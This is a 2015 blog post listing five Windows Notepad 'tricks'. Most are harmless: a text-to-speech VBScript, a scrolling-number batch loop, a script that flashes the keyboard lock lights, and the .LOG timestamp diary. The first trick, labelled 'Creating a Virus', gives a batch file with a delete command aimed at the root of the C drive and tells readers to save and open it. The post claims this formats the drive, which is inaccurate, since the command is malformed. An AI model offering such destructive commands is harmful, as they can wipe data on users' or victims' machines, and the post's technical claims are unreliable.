ComRȁde PyRate

Saturday 7 March 2015

Best Notepad tricks probably you never heard of

Notepad is the plain text editor which is very comfortable in creating basic text files. They are saved as .txt files which have no format of tags or styles and this type of notepad environment is used to write a source code in it in which suitable for editing system files to use in a DOS environment.
notepad-tricks
Notepad is not just a simple and plain text creating software it is a powerful one which we can use to create different types of hack commands, opening many extensions files and also creating own batch file programs. Here we are sharing top five notepad tricked which we summed up follow them carefully
Creating a Virus
This is the most powerful and top tricks in the notepad which we can create a dangerous virus that will format your Windows C drive
  • Open the Notepad from your windows system
  • Paste the below code given
@Echo off
Del C:\ *.* |y
  • After pasting the code save the file as bat
  • Now to format your C drive just open this file.
Make your PC speak
This trick is too funny and easy to create which we just have to paste a code, by this we can make our system speak that what we are typing.So, follow the below steps
  • Open the Notepad from your windows system
  • Paste the below code given
Dim message, sapi
message=InputBox(“What do you want me to say?”,”ATT Text To Speak”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak message

  • After pasting the code save the file as vbs
  • Now, open the saved file then a window opens which you have to type anything you want and press OK button then your system speaks.
Matrix Effect
Follow the below steps carefully to create a matrix like effects in your Notepad
  • Open the Notepad from your windows system
  • Paste the below code given
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
  • After pasting the code save the file as bat
  • Then open the saved to see the matrix effect.

Make your Keyboard lights dance
This trick will make your keyboard’s three lights (Num Lock, Caps Lock, Scroll Lock) on and off randomly in which these will create a dancing light effect. Follow the below steps given below
  • Open the Notepad from your windows system
  • Paste the below code given
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
  • After pasting the code save the file as vbs
  • Then open your saved file which you can experience the amazing dancing light effect.
Create your Diary
This the most important trick and people having habit of writing Diary will love this. It creates your own diary in which if we write any information in it is saved automatically with date and time. Follow the below steps given below to create your diary
  • Open the Notepad from your windows system
  • Here no code is pasted just type .LOG in your Notepad
  • Save the file as txt
  • That’s it this is very easy to create now, open it and write anything it will be saved automatically with date and time.
And you are done. Please let us know if you face any issues through comments.

No comments:

Post a Comment